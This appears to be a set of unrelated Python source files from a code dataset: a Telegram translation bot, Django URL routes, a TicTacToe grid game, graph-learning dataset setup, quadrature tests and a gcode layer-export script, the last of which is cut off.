        r = requests.get(self.base_url,
                         headers={'Authorization': 'Bearer {}'.format(self.token)})
        return r.json()

    def set_value(self, key, value):
        """Store `value` (JSON-serialised) under `key`."""
        r = requests.put(self.base_url + '/{}'.format(key),
                         headers={'Authorization': 'Bearer {}'.format(self.token)},
                         data=json.dumps({'value': value}))
        if r.status_code != 200:
            # Fix: the original used Python 2 print-statement syntax here;
            # the call form works on both Python 2 and 3.
            print(r.text)

    def get_value(self, key):
        """Return the stored value for `key` (KeyError semantics are the
        server's: a missing key surfaces as a failed JSON lookup)."""
        r = requests.get(self.base_url + '/{}'.format(key),
                         headers={'Authorization': 'Bearer {}'.format(self.token)})
        return r.json()['value']
| StarcoderdataPython |
1887741 | <filename>WEB21-1-12/WEB2/tempcomp/urls.py<gh_stars>0
from django.urls import path, re_path
from . import views
# URL routes for the temperature-compensation app.
urlpatterns = [
    # History endpoints.
    re_path(r'^show_history/$', views.show_tempcomp_history,),
    re_path(r'^clear_history/$', views.clear_tempcomp_history,),
    re_path(r'^set_history/$', views.set_tempcomp_history,),
    # File upload / export.
    re_path(r'^upload/$', views.tempcomp_upload,),
    # Consistency: raw-string prefix like the other patterns (no behaviour
    # change for this pattern, but safe if escapes are added later).
    re_path(r'^export/$', views.big_file_download,)
]
| StarcoderdataPython |
9798807 | <filename>start.py<gh_stars>1-10
#!/usr/bin/python3.7
import re
import logging
from sys import path as syspath
from aiogram import Bot, Dispatcher, executor, types
from aiogram.types import InlineQuery, InputTextMessageContent, InlineQueryResultArticle, \
InlineKeyboardButton
from configparser import ConfigParser
from stathat import StatHat
from sentry_sdk import init, capture_message
from clean import output
from gtrans import trans, trans_auto
from termcolor import cprint
# Initialise the bot configuration; abort on any config problem.
try:
    cfg = ConfigParser()
    cfg.read(syspath[0] + '/config.ini')
    API_TOKEN = cfg.get('bot', 'token')
    ADMIN_ID = cfg.get('bot', 'admin')
    PROXY_URL = cfg.get('bot', 'proxy')
    # Stats are skipped when falsy. NOTE(review): this is a string, so any
    # non-empty value (even "0"/"false") is truthy -- confirm intended values.
    STAT = cfg.get('stat', 'enabled')
    STAT_ACCOUNT = cfg.get('stat', 'account')
    STAT_INSTANCE = cfg.get('stat', 'instance')
    SENTRY_SDK = cfg.get('sentry', 'sdk')
    GROUP_LIST = cfg.get('group', 'enabled')
    LANG = cfg.get('lang', 'destination')  # currently unused
except Exception as config_err:
    cprint('Config file error, exit...', 'white', 'on_red')
    capture_message('Config file error, exit...')
    # Fix: print the caught exception instance, not the Exception class.
    print(config_err)
    exit()
# Configure logging, the bot (optionally through a proxy), its dispatcher,
# and Sentry error reporting.
logging.basicConfig(level=logging.INFO)
bot = Bot(token=API_TOKEN, proxy=PROXY_URL)
dp = Dispatcher(bot)
init(SENTRY_SDK, traces_sample_rate=1.0)  # sentry_sdk.init
# Inline keyboard with a single "delete this message" button, attached to
# every bot reply.
delete_btn = types.InlineKeyboardMarkup(resize_keyboard=True, selective=True)
# delete_btn.insert(InlineKeyboardButton(text='👍', callback_data='vote'))
delete_btn.insert(InlineKeyboardButton(text='🗑️', callback_data='delete'))
# Function definitions
@dp.callback_query_handler(text='delete')
async def _(call: types.CallbackQuery):
    # Delete the bot reply the button is attached to and acknowledge the tap.
    await call.message.delete()
    await call.answer(text="该消息已删除")
def translate_text(text, lang='zh-CN', detect=1, type=0):
    """Translate `text` and return the cleaned result.

    type == 1 selects auto language detection; any other value translates
    into `lang`.  `detect` is accepted for backward compatibility but is
    currently unused.  NOTE: `type` shadows the builtin; the name is kept so
    any keyword callers keep working.
    """
    if type == 1:  # Auto Translation
        translated_cleaned = output(trans_auto(text))
    else:
        # Specific target language. (The original had two identical branches
        # for type == 0 and the fallback; they are collapsed here.)
        translated_cleaned = output(trans(text, lang))
    if STAT:
        # Best-effort usage counter; a stats failure must not break the reply.
        try:
            stathat = StatHat()
            stathat.ez_post_count(STAT_ACCOUNT, STAT_INSTANCE, 1)
        except Exception as e:
            # Fix: corrected the misspelled "susceed" in the log message.
            cprint('Request succeeded but stat failed!' + str(e), 'white', 'on_red')
            capture_message('Request succeeded but stat failed!')
    return translated_cleaned
def translate_msg(message: types.Message,
                  offset: int = 0,
                  lang: str = None,
                  reg: str = None):
    """Extract the text to translate from `message` and translate it.

    offset: number of leading characters (the command) to strip.
    lang:   target language code passed through to translate_text().
    reg:    optional regex of trigger words to strip from the text.
    """
    if message.reply_to_message:  # replying: translate the replied-to text
        text = message.reply_to_message.text
    else:  # otherwise translate the text that follows the command
        text = message.text[offset:]  # strip the command itself
    try:
        # Remove the bot mention; guarded because `text` may be None
        # (e.g. when replying to a non-text message).
        text = text.replace('@xvkes_translate_bot', '').strip()
    except:
        pass
    if reg:
        text = re.sub(reg, '', text)
    if len(text) == 0:
        if message.reply_to_message:
            # NOTE(review): the replied-to message was empty here, so an
            # empty string is translated -- confirm this is intended.
            clog(message)
            capture_message(message)
            result = translate_text(text, lang)
            return result
        else:
            # No argument and not a reply: return a usage hint.
            result = '''忘记添加需要翻译的文本?请在命令后添加需要翻译的话,例如:
/en 你好
'''
            return result
    else:
        clog(message)
        capture_message(message)
        result = translate_text(text, lang)
        print(result)
        return result
def translate_auto(message: types.Message,
                   offset: int = 0,
                   lang: str = None,
                   reg: str = None):
    """Auto-detect the source language and translate.

    Uses the replied-to message when the current message is (almost) only a
    trigger word; otherwise translates the remainder of the message text.
    """
    if message.reply_to_message and (len(
            re.sub(
                r'^(translate|trans|tran|翻译|中文|Chinese|zh|英文|英语|English|en)',
                "", message.text)) <= 1):  # bare trigger word on a reply
        text = message.reply_to_message.text
    else:  # inline text after the trigger word
        text = message.text[offset:]
        text = text.replace('@xvkes_translate_bot', '').strip()
    if reg:
        text = re.sub(reg, '', text)
    if len(text) == 0:
        if message.reply_to_message:
            # NOTE(review): replied-to text was empty; an empty string is
            # translated -- confirm this is intended.
            clog(message)
            capture_message(message)
            result = translate_text(text)
            return result
        else:
            # No argument and not a reply: return a usage hint.
            result = '''忘记添加需要翻译的文本?请在命令后添加需要翻译的话,例如:
/en 你好
'''
            return result
    else:
        clog(message)
        capture_message(message)
        result = trans_auto(text)
        print(result)
        return result
def clog(message):
    """Log an incoming message to the console (cyan) and to Sentry.

    Group chats log the group title/id plus the sender; private chats log
    only the chat name and user id.
    """
    chat_type = message.chat.type
    user = message.from_user.username
    user_id = message.from_user.id
    group = message.chat.title
    group_id = message.chat.id
    chat_name = message.chat.username or message.from_user.username
    if group:
        # Fix: the original f-string contained "\@", which printed a literal
        # backslash before the username; a plain "@" is the intended format.
        log_msg = f'[{chat_type}, %{group}, %{group_id}, &{chat_name}, @{user}, #{user_id}] {message.text}'
        cprint(log_msg, 'white', 'on_cyan')
        capture_message(log_msg)
    else:
        log_msg = f'[{chat_type}, @{chat_name}, #{user_id}] {message.text} '
        cprint(log_msg, 'white', 'on_cyan')
        capture_message(log_msg)
####################################################################################################
# 欢迎词
@dp.message_handler(commands=['start', 'welcome', 'about', 'help'])
async def command_start(message: types.Message):
    # Send the (Chinese) usage/help text for /start, /welcome, /about, /help.
    intro = '''使用说明:
- 私聊机器人,自动翻译文字消息;
- 群聊中添加机器人,使用命令翻译指定消息;
- 任意聊天框,输入 @xvkes_translate_bot 实时翻译。
使用样例:
/fy 检测语言并翻译
/zh Translate a sentence into Chinese.
/en 翻译到英文
最近更新
- [2021.05.25] 补全配置模板,增加代理'''
    await bot.send_chat_action(message.chat.id, action="typing")
    await message.answer(intro)
####################################################################################################
# 翻译命令
####################################################################################################
# 中英文
# /fy, /tr, /翻译: translate the command argument (or the replied-to
# message); offset 3 strips the 3-character command prefix.
@dp.message_handler(commands=['fy', 'tr', '翻译'])
async def command_fy(message: types.Message):
    await bot.send_chat_action(message.chat.id, action="typing")
    result = translate_msg(message, 3)  # None -> Chinese + English
    await message.reply(result, reply_markup=delete_btn)
# 中文
# /zh: translate into Chinese.
@dp.message_handler(commands=['zh'])
async def command_zh(message: types.Message):
    await bot.send_chat_action(message.chat.id, action="typing")
    result = translate_msg(message, 3, 'zh')
    await message.reply(result, reply_markup=delete_btn)
# 英文
# /en: translate into English.
@dp.message_handler(commands=['en'])
async def command_en(message: types.Message):
    await bot.send_chat_action(message.chat.id, action="typing")
    result = translate_msg(message, 3, 'en')
    await message.reply(result, reply_markup=delete_btn)
# /id: reply with the numeric chat id (handy for configuration).
@dp.message_handler(commands=['id'])
async def command_id(message: types.Message):
    await bot.send_chat_action(message.chat.id, action="typing")
    result = message.chat.id
    await message.reply(result, reply_markup=delete_btn)
####################################################################################################
# 自然指令
####################################################################################################
# Natural-language trigger followed by text: auto-translate the remainder.
@dp.message_handler(regexp='^(translate|trans|tran|翻译) ')
async def keyword_fy(message: types.Message):
    result = translate_msg(message, reg='^(translate|trans|tran|翻译) ')
    await bot.send_chat_action(message.chat.id, action="typing")
    await message.reply(result, reply_markup=delete_btn)
# English trigger word followed by text: translate the remainder to English.
@dp.message_handler(regexp='^(英文|英语|English|en) ')
async def keyword_en(message: types.Message):
    result = translate_msg(message, lang='en', reg='^(英文|英语|English|en) ')
    await bot.send_chat_action(message.chat.id, action="typing")
    await message.reply(result, reply_markup=delete_btn)
# Chinese trigger word followed by text: translate the remainder to Chinese.
@dp.message_handler(regexp='^(中文|Chinese|zh) ')
async def keyword_zh(message: types.Message):
    result = translate_msg(message, lang='zh', reg='^(中文|Chinese|zh) ')
    await bot.send_chat_action(message.chat.id, action="typing")
    await message.reply(result, reply_markup=delete_btn)
# Bare trigger word (no trailing space): only acts when the message is a
# reply; otherwise silently ignored.
@dp.message_handler(regexp='^(translate|trans|tran|翻译)')
async def reply_keyword_fy(message: types.Message):
    if message.reply_to_message:
        result = translate_msg(message, reg='^(translate|trans|tran|翻译)')
        await bot.send_chat_action(message.chat.id, action="typing")
        await message.reply(result, reply_markup=delete_btn)
@dp.message_handler(regexp='^(英文|English|en)')
async def reply_keyword_en(message: types.Message):
    # Bare keyword: translate the replied-to message into English.
    if message.reply_to_message:
        result = translate_msg(message, lang='en', reg='^(英文|English|en)')
        await bot.send_chat_action(message.chat.id, action="typing")
        await message.reply(result, reply_markup=delete_btn)
@dp.message_handler(regexp='^(中文|Chinese|zh)')
async def reply_keyword_zh(message: types.Message):
    # Bare keyword: translate the replied-to message into Chinese.
    if message.reply_to_message:
        result = translate_msg(message, lang='zh', reg='^(中文|Chinese|zh)')
        await bot.send_chat_action(message.chat.id, action="typing")
        await message.reply(result, reply_markup=delete_btn)
####################################################################################################
# Private chat: auto-detect the language and translate; inline-button callbacks
####################################################################################################
@dp.callback_query_handler(text='translate')
async def query_translate(call: types.CallbackQuery):
    """Inline-button handler: re-translate an already-translated message.

    The bot's message looks like ``<header>▸<original>…▸<translation>``;
    the last ``▸`` segment (the latest translation) is auto-translated again
    and the message is edited in place.
    """
    # Fix: the original also extracted ``origin_msg`` here but never used it.
    translated_msg = call.message.text.split('▸')[-1]
    await call.answer(text="消息已翻译 Message translated")
    await bot.edit_message_text("`" + call.message.text.split('▸')[0] + "`" + \
                                output(trans_auto(translated_msg)), call.message.chat.id, call.message.message_id,
                                parse_mode="markdown")
@dp.callback_query_handler(text=['zh', 'en', 'ja', 'ru', 'vi'])
async def query_specify(call: types.CallbackQuery):
    # Language-flag button: translate the replied-to message into the chosen
    # language and swap the keyboard back to the compact (flag + delete) form.
    languages = {'zh': '🇨🇳', 'en': '🇺🇸', 'ja': '🇯🇵', 'ru': '🇷🇺', 'vi': '🇻🇳'}
    # await bot.send_chat_action(message.chat.id, action="typing")
    reply_message = call.message.reply_to_message
    reply_text = reply_message.text
    action_btn = types.InlineKeyboardMarkup(resize_keyboard=True,
                                            selective=True)
    action_btn.insert(
        InlineKeyboardButton(text=f'{languages[call.data]}',
                             callback_data='select'))
    action_btn.insert(InlineKeyboardButton(text='🗑️', callback_data='del'))
    await call.answer(text=f"{languages[call.data]} 正在翻译 Translating...")
    await bot.edit_message_text(output(translate_text(reply_text, call.data)), call.message.chat.id,
                                call.message.message_id, parse_mode="markdown", reply_markup=action_btn)
    # await call.answer(text="消息已翻译 Message translated")
@dp.callback_query_handler(text='del')
async def query_delete(call: types.CallbackQuery):
    # 🗑️ button: acknowledge the tap and remove the bot's message.
    # await bot.send_chat_action(message.chat.id, action="typing")
    await call.answer(text="消息已删除 Message deleted")
    await call.message.delete()
@dp.callback_query_handler(text='select')
async def query_select(call: types.CallbackQuery):
    # "Choose language" button: expand the keyboard to one flag per language.
    # await bot.send_chat_action(message.chat.id, action="typing")
    action_btn = types.InlineKeyboardMarkup(resize_keyboard=True,
                                            selective=True)
    action_btn.insert(InlineKeyboardButton(text='🇨🇳', callback_data='zh'))
    action_btn.insert(InlineKeyboardButton(text='🇺🇸', callback_data='en'))
    action_btn.insert(InlineKeyboardButton(text='🇯🇵', callback_data='ja'))
    action_btn.insert(InlineKeyboardButton(text='🇷🇺', callback_data='ru'))
    action_btn.insert(InlineKeyboardButton(text='🗑️', callback_data='del'))
    await call.answer(text="请选择一种语言 Please select a language")
    await bot.edit_message_text(call.message.text, call.message.chat.id,
                                call.message.message_id, parse_mode="markdown",
                                disable_web_page_preview=True, reply_markup=action_btn)
@dp.callback_query_handler(text='mute')
async def query_mute(call: types.CallbackQuery):
    # "Mute" button: restore the untranslated text (first '▸' segment).
    origin_msg = call.message.text.split('▸')[1].split('\n')[0]
    # await bot.send_chat_action(message.chat.id, action="typing")
    await call.answer(text="显示原消息 Original message showed")
    await bot.edit_message_text(origin_msg, call.message.chat.id, call.message.message_id,
                                parse_mode="markdown")
@dp.message_handler(content_types=types.message.ContentType.TEXT)
async def text_translate(message: types.Message):
    # Catch-all text handler: auto-translate in private chats and in
    # whitelisted groups; everything else is silently ignored.
    chat_type = message.chat.type
    chat_id = message.chat.id
    action_btn = types.InlineKeyboardMarkup(resize_keyboard=True,
                                            selective=True)
    action_btn.insert(
        InlineKeyboardButton(text='🇨🇳🇺🇸🇯🇵', callback_data='select'))
    action_btn.insert(InlineKeyboardButton(text='🗑️', callback_data='del'))
    if chat_type == 'private':
        await bot.send_chat_action(message.chat.id, action="typing")
        capture_message(
            f'[{chat_type}, @{message.from_user.id}, #{message.from_user.first_name}] {message.text} '
        )
        result = translate_text(message.text)
        await message.reply(result, disable_notification=True)
    elif ((chat_type == 'group') or
          (chat_type == 'supergroup')) and (str(chat_id) in GROUP_LIST):
        cprint(f"{chat_id} 自动翻译 {message.text}", 'white', 'on_cyan')
        capture_message(
            f'[{chat_type}, @{message.from_user.id}, #{message.from_user.first_name}] {message.text} '
        )
        await bot.send_chat_action(message.chat.id, action="typing")
        result = output(trans_auto(message.text))
        await message.reply( result, parse_mode='markdown', disable_notification=True,
                            disable_web_page_preview=True, reply_markup=action_btn)
    else:  # filter out all non-whitelisted groups and channels
        # print(str(message.chat.id) in GROUP_LIST)
        pass
@dp.message_handler()
async def text_others(message: types.Message):
    """Fallback for any update not caught by earlier handlers (non-text content)."""
    print('Other types')
    capture_message('Other types')
    try:
        # NOTE(review): ``message`` is an aiogram Message, not a str — confirm
        # sentry serializes it usefully.
        capture_message(message)
        await bot.send_chat_action(message.chat.id, action="typing")
        result = translate_text(message.text)
    except Exception as e:
        print('Exception', e)
        # Bug fix: capture_message(msg, level) was called as
        # capture_message('Exception', e), passing the exception object as
        # sentry's *level* argument; send one formatted string instead.
        capture_message(f'Exception {e}')
        result = '? ? ?'
    await message.answer(result)
# Inline-mode handler
@dp.inline_handler()
async def inline(inline_query: InlineQuery):
    """Answer an inline query with EN/ZH/JA/PT translations of its text.

    Bug fix: the original fell through to ``answer_inline_query`` even for
    the empty placeholder query, where ``items`` was never built, raising
    NameError on every empty query.
    """
    text = inline_query.query or '输入以翻译 Input to Translate...'
    user = inline_query.from_user.username
    user_id = inline_query.from_user.id
    end_str = ''
    if len(text) >= 256:
        # Telegram caps inline queries at 256 chars; flag the truncation.
        end_str = '\n\n(达到长度限制,请私聊翻译全文)'
    if text == '输入以翻译 Input to Translate...':
        # Empty query: nothing to translate, nothing to answer.
        return
    cprint(f'[inline, @{user}, #{user_id}] {text} ', 'white', 'on_cyan')
    capture_message(f'[inline, @{user}, #{user_id}] {text} ')
    zh_str = translate_text(text, 'zh')
    en_str = translate_text(text, 'en')
    jp_str = translate_text(text, 'ja')
    pt_str = translate_text(text, 'pt')
    # Display order: English, Chinese, Japanese, Portuguese.
    entries = [(en_str, '🇺🇸 English'), (zh_str, '🇨🇳 中文'),
               (jp_str, '🇯🇵 にほんご'), (pt_str, '🇵🇹 Português')]
    items = [
        InlineQueryResultArticle(
            id=idx,
            title=f'{translated}'.strip(),
            description=description,
            thumb_width=0,
            input_message_content=InputTextMessageContent(
                f'{translated}{end_str}', disable_web_page_preview=True),
        )
        for idx, (translated, description) in enumerate(entries)
    ]
    await bot.answer_inline_query(inline_query.id,
                                  results=items,
                                  cache_time=300)
if __name__ == '__main__':
    cprint('I\'m working now...', 'white', 'on_green')
    # capture_message('I\'m working now...')
    # Long polling; skip_updates drops messages received while the bot was down.
    executor.start_polling(dp, skip_updates=True)
| StarcoderdataPython |
5038288 | <reponame>LeLuxNet/GridPy
from lib import app, led
class App(app.GridGame):
    # TicTacToe on a 3x3 LED grid, built on the GridPy GridGame base class.
    def __init__(self):
        # "TicTacToe", width=3, height=3, and (presumably) 3-in-a-row to win
        # — TODO confirm the fourth argument's meaning against GridGame.
        super().__init__("TicTacToe", 3, 3, 3)
        self.board = self.calc_board()
    def _render(self, cords):
        # Map LED coordinates to a board cell; ``self.board`` appears to hold
        # cell sizes/offsets (indices 0-4) — layout comes from calc_board,
        # TODO confirm the index meanings.
        x = (cords.x - self.board[2]) // self.board[1]
        y = (cords.y - self.board[4]) // self.board[0]
        if x < 0 or x >= self.width or y < 0 or y >= self.height:
            # Outside the board: frame lit in the current player's light color.
            return self.turn.light_color
        elif self.game[x][y] is not None:
            # Occupied cell: show the owning player's color.
            return self.game[x][y].color
        elif self.sel_col == x and (self.sel_row == -1 or self.sel_row == y):
            # Current selection (whole column when sel_row == -1).
            return led.COLOR_WHITE
        return led.COLOR_BLACK
    def drop(self):
        # Commit the selected cell to the player whose turn it is.
        self.game[self.sel_col][self.sel_row] = self.turn
| StarcoderdataPython |
3509999 | <reponame>linlin-yu/Graph-Posterior-Network
from gpn.data import DatasetManager, get_ood_split_evasion
from gpn.data import InMemoryDatasetProvider, OODInMemoryDatasetProvider
from gpn.data import OODIsolatedInMemoryDatasetProvider
from gpn.utils import DataConfiguration
def set_num_left_out(data_cfg: DataConfiguration):
    """utility function setting the number-of-left-out classes for LOC experiments for each dataset accordingly

    Args:
        data_cfg (DataConfiguration): original data configuration

    Raises:
        ValueError: raised if unsupported dataset found
    """
    name = data_cfg.dataset
    # Ordered (predicate, num_left_out) rules; the first match wins, exactly
    # mirroring the original elif chain (exact names before substring checks).
    rules = (
        (lambda n: n in ('Cora', 'CoraML', 'Cora01', 'Cora02', 'Cora03'), 3),
        (lambda n: n == 'CoraFull', 30),
        (lambda n: n in ('CiteSeer', 'CiteSeer01', 'CiteSeer02', 'CiteSeer03'), 3),
        (lambda n: 'PubMed' in n, 1),
        (lambda n: 'AmazonPhotos' in n, 3),
        (lambda n: 'AmazonComputers' in n, 5),
        (lambda n: n == 'ogbn-arxiv', 15),
        (lambda n: 'CoauthorPhysics' in n, 2),
        (lambda n: 'CoauthorCS' in n, 4),
        (lambda n: n == 'SynCora', 2),
        (lambda n: n == 'SynProducts', 3),
    )
    for matches, num_left_out in rules:
        if matches(name):
            data_cfg.set_values(ood_num_left_out_classes=num_left_out)
            return
    raise ValueError(f'Dataset {data_cfg.dataset} not supported!')
class ExperimentDataset:
    """wrapper for dataset to be used in an experiment

    Sets up the dataset as specified for all different kinds of experiments, e.g. OOD experiments.
    """

    def __init__(self, data_cfg: DataConfiguration, to_sparse: bool = False):
        self.data_cfg = data_cfg
        # Presumably instantiating the manager split_no times advances the
        # split RNG so the final ``dataset`` is the requested split — TODO confirm.
        for _ in range(data_cfg.split_no):
            dataset = DatasetManager(**data_cfg.to_dict())
        default_dataset = InMemoryDatasetProvider(dataset)
        self.dim_features = default_dataset.num_features
        self.num_classes = default_dataset.num_classes
        # By default all roles point at the same in-memory provider; the OOD
        # setups below replace some of them.
        self.train_dataset = default_dataset
        self.train_val_dataset = default_dataset
        self.val_dataset = default_dataset
        self.ood_dataset = None
        self.to_sparse = to_sparse
        self.splits = ('train', 'test', 'val', 'all')
        if data_cfg.ood_flag:
            if data_cfg.ood_setting == 'evasion':
                self._setup_evasion()
            elif data_cfg.ood_setting == 'poisoning':
                self.splits = ('train', 'test', 'val')
                self._setup_poisoning()
            else:
                raise ValueError
        else:
            if to_sparse:
                self.train_dataset.to_sparse()
        # finally reset number of classes (OOD setups may have removed classes)
        self.num_classes = self.train_dataset.num_classes
        # if nothing further specified: warmup/finetuning on training dataset
        self.warmup_dataset = self.train_dataset
        self.finetune_dataset = self.train_dataset
        self.train_loader = None
        self.train_val_loader = None
        self.val_loader = None
        self.ood_loader = None
        self.warmup_loader = None
        self.finetune_loader = None
        self.setup_loader()

    def setup_loader(self):
        # (Re)build loaders from the currently assigned dataset providers.
        self.train_loader = self.train_dataset.loader()
        self.train_val_loader = self.train_val_dataset.loader()
        self.val_loader = self.val_dataset.loader()
        if self.ood_dataset is not None:
            self.ood_loader = self.ood_dataset.loader()
        else:
            self.ood_loader = None
        if self.warmup_dataset is not None:
            self.warmup_loader = self.warmup_dataset.loader()
        else:
            self.warmup_loader = None
        if self.finetune_dataset is not None:
            self.finetune_loader = self.finetune_dataset.loader()
        else:
            self.finetune_loader = None

    def _setup_evasion(self):
        # in evasion setting, also allow perturbations
        # of the set of training nodes
        # budget: val_dataset and ood_dataset are the same
        # isolated: val dataset is not perturbed, ood set is perturbed
        if self.data_cfg.ood_dataset_type == 'budget':
            self.ood_dataset = OODInMemoryDatasetProvider(self.val_dataset)
            self.ood_dataset.perturb_dataset(**{**self.data_cfg.to_dict(), 'perturb_train_indices': True})
            self.val_dataset = self.ood_dataset
            if self.to_sparse:
                self.ood_dataset.to_sparse()
        elif self.data_cfg.ood_dataset_type == 'isolated':
            self.ood_dataset = OODIsolatedInMemoryDatasetProvider(
                self.val_dataset, self.data_cfg.ood_type, **self.data_cfg.to_dict())
            if self.to_sparse:
                self.val_dataset.to_sparse()
        else:
            raise ValueError

    def _setup_poisoning(self):
        # train dataest is perturbed (new train_loader)
        # val_loader and ood_loader are based on perturbed val_dataset
        if self.data_cfg.ood_type == 'leave_out_classes':
            set_num_left_out(self.data_cfg)
            self.train_dataset = OODInMemoryDatasetProvider(self.train_dataset)
            self.train_dataset.perturb_dataset(**{**self.data_cfg.to_dict(), 'perturb_train_indices': True})
            if self.to_sparse:
                self.train_dataset.to_sparse()
            self.train_val_dataset = self.train_dataset
            self.ood_dataset = self.train_dataset
            self.val_dataset = self.train_dataset
        elif self.data_cfg.ood_type == 'leave_out_classes_evasion':
            assert len(self.train_dataset) == 1
            set_num_left_out(self.data_cfg)
            # Split the single graph into ID (train) and OOD (val/ood) copies.
            id_data, ood_data, num_classes = get_ood_split_evasion(
                self.train_dataset[0],
                num_classes=self.train_dataset.num_classes,
                perturb_train_indices=True,
                **self.data_cfg.to_dict()
            )
            self.train_dataset.data_list = [id_data]
            self.train_dataset.set_num_classes(num_classes)
            self.train_val_dataset = self.train_dataset
            if self.to_sparse:
                self.train_dataset.to_sparse()
            self.val_dataset = self.train_dataset.clone(shallow=True)
            self.val_dataset.data_list = [ood_data]
            self.val_dataset.set_num_classes(num_classes)
            self.ood_dataset = self.val_dataset
            if self.to_sparse:
                self.val_dataset.to_sparse()
        elif self.data_cfg.ood_dataset_type == 'budget':
            self.train_dataset = OODInMemoryDatasetProvider(self.train_dataset)
            self.train_dataset.perturb_dataset(**{**self.data_cfg.to_dict(), 'perturb_train_indices': False})
            self.train_val_dataset = self.train_dataset
            self.ood_dataset = self.train_val_dataset
            self.val_dataset = self.train_val_dataset
            if self.to_sparse:
                self.train_dataset.to_sparse()
        else:
            raise ValueError
| StarcoderdataPython |
8085651 | <reponame>ehealthz-lab/microservice-chatbot-python-template
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import configparser
from objects import tokens
import requests
configfile = "config.conf"  # Configuration file


class deregistration():
    """Deregisters this microservice's functionality from the net dispatcher."""

    # (option name in the config file, key used in self.config)
    _OPTIONS = (
        ("client_id", "CLIENT_ID"),
        ("file_cert_dispatcher", "RUTA_CERT"),
        ("delete_functionality", "DELETE_FUNCTIONALITY"),
    )

    def __init__(self):
        self.config = {}
        # Client Configuration from file config.cfg
        cfg = configparser.ConfigParser()
        if not cfg.read(configfile, "utf8"):
            print("File does not exist")
        # Load every required option, reporting each missing one individually
        # (same behaviour as the original three copy-pasted blocks).
        for option, key in self._OPTIONS:
            if cfg.has_option("net_dispatcher", option):
                self.config[key] = cfg.get("net_dispatcher", option)
            else:
                print("Config file need to have {} field".format(option))

    def deregister(self):
        """Delete this client's functionality entry on the dispatcher."""
        # It checks expiration time of the token
        tokens.server_token().exp_token()
        # It obtains the token
        token = tokens.server_token().get_tokenDB()
        # It deletes the funcionality in the database
        data = requests.delete(self.config['DELETE_FUNCTIONALITY'] + "?client_id=" + self.config['CLIENT_ID'],
                               headers={'Authorization': 'Bearer ' + token['Data']['id_token']},
                               verify=self.config['RUTA_CERT'])
        print(data.content)
| StarcoderdataPython |
9644966 | <filename>tests/test_quadrature.py
import unittest
import numpy as np
from empirical.quadrature import *
def function(x):
    # Oscillatory test integrand used to exercise each quadrature rule.
    return np.cos(5 * x) + x * np.sin(30 * x)
def function_integral(x):
    # Closed-form antiderivative of ``function`` (up to a constant); used to
    # produce reference values for the integration tests.
    cos_term = -x * np.cos(30 * x) / 30
    sin5_term = np.sin(5 * x) / 5
    sin30_term = np.sin(30 * x) / 900
    return cos_term + sin5_term + sin30_term


# Exact value of the integral of ``function`` over [-1, 1].
integration_value = function_integral(1) - function_integral(-1)
class QuadratureTest(unittest.TestCase):
    """Sanity checks for the 1-D quadrature rules on [-1, 1].

    Each test checks node/weight shapes, endpoint handling, that the odd
    integrand ``x`` integrates to ~0, and (where accurate enough) that the
    oscillatory ``function`` integrates to the analytic ``integration_value``.
    (Fix: the original final line had a dataset-extraction artifact fused
    onto it, which made the file unparseable.)
    """

    def test_linear(self):
        N = 250
        x, w = linear(N)
        self.assertEqual(x.shape, (N,))
        self.assertEqual(w.shape, (N,))
        # Linear (equispaced) nodes include both endpoints.
        self.assertEqual(x[0], -1)
        self.assertEqual(x[-1], 1)
        integrate = np.sum(x * w)
        self.assertAlmostEqual(integrate, 0, places=10)
        # no use testing sinusoid integration, it'll be widely off

    def test_pt(self):
        N = 250
        x, w = periodic_trapezoid(N)
        self.assertEqual(x.shape, (N,))
        self.assertEqual(w.shape, (N,))
        # Periodic trapezoid nodes exclude the endpoints.
        self.assertNotIn(-1, x)
        self.assertNotIn(1, x)
        integrate = np.sum(x * w)
        self.assertAlmostEqual(integrate, 0, places=10)
        integrate = np.sum(function(x) * w)
        self.assertAlmostEqual(integrate, integration_value, places=4)

    def test_t(self):
        N = 251
        x, w = trapezoid(N)
        self.assertEqual(x.shape, (N,))
        self.assertEqual(w.shape, (N,))
        self.assertEqual(x[0], -1)
        self.assertEqual(x[-1], 1)
        integrate = np.sum(x * w)
        self.assertAlmostEqual(integrate, 0, places=10)
        integrate = np.sum(function(x) * w)
        self.assertAlmostEqual(integrate, integration_value, places=2)

    def test_lgl(self):
        N = 250
        x, w = legendre_gauss_lobatto(N)
        self.assertEqual(x.shape, (N,))
        self.assertEqual(w.shape, (N,))
        integrate = np.sum(x * w)
        self.assertAlmostEqual(integrate, 0, places=10)
        # Spectral accuracy: matches the analytic value to 10 places.
        integrate = np.sum(function(x) * w)
        self.assertAlmostEqual(integrate, integration_value, places=10)
# exports the skin gcode for each layer into their own skin layer files
import PRNTR
import shutil
# Layer range for the skin export, taken from the slicer configuration in PRNTR.
path1 = PRNTR.location
bottom_range1 = PRNTR.bottom_range
# int() accepts str and int directly; the original round-tripped the value
# through '{}'.format() first, which was redundant.
bottom_range2 = int(bottom_range1)
print(bottom_range2)
top_range1 = PRNTR.top_range
top_range2 = int(top_range1)
print(top_range2)
def copi():
    """Copy each layer's gcode file into the skin sub-folder.

    Fixes over the original: the dead ``number = int`` rebinding is gone, the
    per-iteration nested ``copy()`` helper is inlined, and the loop now uses
    ``top_range2`` (the int-converted bound) consistently with ``skin()``
    instead of the unconverted ``top_range1``.
    """
    for number in range(bottom_range2, top_range2):
        image_name = 'Layer{}'.format(number)
        print('Layer{}'.format(number))
        # Copy the file into the skin folder, keeping its name.
        src = '{}/files/Layer/{}.gcode'.format(path1, image_name)
        dst = '{}/files/Layer/skin/{}.gcode'.format(path1, image_name)
        shutil.copyfile(src, dst)
def skin():
    """Strip each copied skin-layer gcode file down to its SKIN section.

    For every layer in [bottom_range2, top_range2) the file
    files/Layer/skin/Layer<N>.gcode is rewritten in place twice:
    ``erase`` drops everything before the ;TYPE:SKIN marker, then ``erase2``
    drops everything from ;MESH:NONMESH up to ;TIME_ELAPSED:.
    """
    for x in range(bottom_range2,top_range2):
        # NOTE(review): ``number = int`` / ``number2 = int`` rebind the names
        # to the int *type* and are immediately overwritten — dead code.
        number = int
        number2 = int
        number = x # g-code layers are numbered from 0, hence the offset bookkeeping below
        number = int(number)
        number2 = 0
        Layernumber = number - number2
        print("")
        print('Layer number:', Layernumber)
        converted_Layernumber = str(Layernumber)
        string_in_string = "Layer{}.gcode".format(converted_Layernumber)
        print(string_in_string)
        def erase(): # erases the top of the file (everything before the skin section)
            """
            This function will delete all line from the givin start_key
            until the stop_key. (include: start_key) (exclude: stop_key)
            """
            start_key = '; Layer:'
            stop_key = ";TYPE:SKIN"
